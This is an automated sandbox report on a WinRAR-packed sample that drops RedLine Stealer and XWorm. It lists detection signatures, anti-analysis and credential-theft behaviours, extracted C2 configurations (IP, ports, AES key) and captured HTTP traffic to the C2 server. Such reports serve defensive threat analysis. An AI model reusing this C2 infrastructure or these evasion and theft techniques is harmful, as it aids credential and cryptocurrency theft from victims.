Edit tour

Windows Analysis Report
KR6CT3hIxT.exe

Overview

General Information

Sample name:	KR6CT3hIxT.exe renamed because original name is a hash value
Original sample name:	5c95d5493dda877b228a6485a6d40d9c.exe
Analysis ID:	1447590
MD5:	5c95d5493dda877b228a6485a6d40d9c
SHA1:	185482dabc06787f6ce14c6cd46c17372a1b77ae
SHA256:	fdb5b2a0041b0939552ecd31e382e28529313c8bc8a656eb7de1cef9fbd6eee9
Tags:	64exetrojan
Infos:

Detection

RedLine, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected RedLine Stealer

Yara detected XWorm

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

KR6CT3hIxT.exe (PID: 6108 cmdline: "C:\Users\user\Desktop\KR6CT3hIxT.exe" MD5: 5C95D5493DDA877B228A6485A6D40D9C)

4.exe (PID: 7208 cmdline: "C:\Users\user\AppData\Local\Temp\4.exe" MD5: D7E09993B21575A255D4CEAF706C205A)

3.exe (PID: 7308 cmdline: "C:\Users\user\AppData\Local\Temp\3.exe" MD5: 215F503316C98618DC6DB327477FD26F)

rdegje.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Temp\rdegje.exe" MD5: 823F263A3D860454EF8092594FFB7EC0)

r.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Local\Temp\r.exe" MD5: CF1A74B1E40E5C34DF68ADD35DA92129)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["195.2.75.12"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: RedLine

{"C2 url": ["195.2.75.12:54762"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6a70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6b0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6c22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x68e2:$cnc4: POST / HTTP/1.1
00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 3.exe PID: 7308	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: r.exe PID: 7776	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: r.exe PID: 7776	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: r.exe PID: 7776	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x4ecc5:$a4: get_ScannedWallets 0x4db6c:$a5: get_ScanTelegram 0x4e94e:$a6: get_ScanGeckoBrowsersPaths 0x4c7ff:$a7: <Processes>k__BackingField 0x49d32:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x4c133:$a9: <ScanFTP>k__BackingField
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.3.exe.f10000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.3.exe.f10000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7022:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ce2:$cnc4: POST / HTTP/1.1
7.2.r.exe.e10000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.r.exe.e10000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.r.exe.e10000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x137ca:$a4: get_ScannedWallets 0x12628:$a5: get_ScanTelegram 0x1344e:$a6: get_ScanGeckoBrowsersPaths 0x1126a:$a7: <Processes>k__BackingField 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10b9e:$a9: <ScanFTP>k__BackingField
7.2.r.exe.e10000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1068a:$u7: RunPE 0x13d41:$u8: DownloadAndEx 0x9330:$pat14: , CommandLine: 0x13279:$v2_1: ListOfProcesses 0x1088b:$v2_2: get_ScanVPN 0x1092e:$v2_2: get_ScanFTP 0x1161e:$v2_2: get_ScanDiscord 0x1260c:$v2_2: get_ScanSteam 0x12628:$v2_2: get_ScanTelegram 0x126ce:$v2_2: get_ScanScreen 0x13416:$v2_2: get_ScanChromeBrowsersPaths 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths 0x13709:$v2_2: get_ScanBrowsers 0x137ca:$v2_2: get_ScannedWallets 0x137f0:$v2_2: get_ScanWallets 0x13810:$v2_3: GetArguments 0x11ed9:$v2_4: VerifyUpdate 0x167e6:$v2_4: VerifyUpdate 0x13bca:$v2_5: VerifyScanRequest 0x132c6:$v2_6: GetUpdates 0x167c7:$v2_6: GetUpdates
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\3.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\r.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["195.2.75.12"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 7.2.r.exe.e10000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["195.2.75.12:54762"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\3.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\3.exe	Virustotal: Detection: 55%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\4.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\4.exe	Virustotal: Detection: 43%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\r.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\r.exe	Virustotal: Detection: 52%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Virustotal: Detection: 35%	Perma Link

Multi AV Scanner detection for submitted file

Source: KR6CT3hIxT.exe	ReversingLabs: Detection: 36%
Source: KR6CT3hIxT.exe	Virustotal: Detection: 55%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\r.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: KR6CT3hIxT.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 2.2.3.exe.f10000.0.unpack	String decryptor: 195.2.75.12
Source: 2.2.3.exe.f10000.0.unpack	String decryptor: 7000
Source: 2.2.3.exe.f10000.0.unpack	String decryptor: <123456789>
Source: 2.2.3.exe.f10000.0.unpack	String decryptor: <Xwormmm>
Source: 2.2.3.exe.f10000.0.unpack	String decryptor: XWorm V5.6
Source: 2.2.3.exe.f10000.0.unpack	String decryptor: USB.exe

Source: KR6CT3hIxT.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4.exe, 00000001.00000000.1688378562.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, 4.exe, 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, rdegje.exe, 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe, 00000006.00000000.1938407320.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe.2.dr, 4.exe.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar-x64-701.exe.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: KR6CT3hIxT.exe
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 3.exe, 00000002.00000002.4149852444.0000000000F20000.00000040.00000001.01000000.0000000A.sdmp, r.exe, 00000007.00000002.2159322752.0000000000E30000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64-701.exe.0.dr

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DDB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7E1DDB190
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DC40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7E1DC40BC
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DEFCA0 FindFirstFileExA,	0_2_00007FF7E1DEFCA0
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B6BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00B6BA94
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B7D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	1_2_00B7D420
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EDBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	6_2_00EDBA94
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EED420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	6_2_00EED420

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 195.2.75.12
Source: Malware configuration extractor	URLs: 195.2.75.12:54762

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49740

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 195.2.75.12:7000

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 195.2.75.12:54762Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 195.2.75.12:54762Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 195.2.75.12:54762Content-Length: 930799Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 195.2.75.12:54762Content-Length: 930791Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: VDSINA-ASRU VDSINA-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.75.12

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 195.2.75.12:54762Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: r.exe, 00000007.00000002.2165535966.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://195.2.75.12:54762
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://195.2.75.12:54762/
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: r.exe, 00000007.00000002.2159196933.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adp/1.0/
Source: r.exe, 00000007.00000002.2159196933.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.microsofo/1.2/
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 3.exe, 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: r.exe, 00000007.00000002.2165535966.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: winrar-x64-701.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
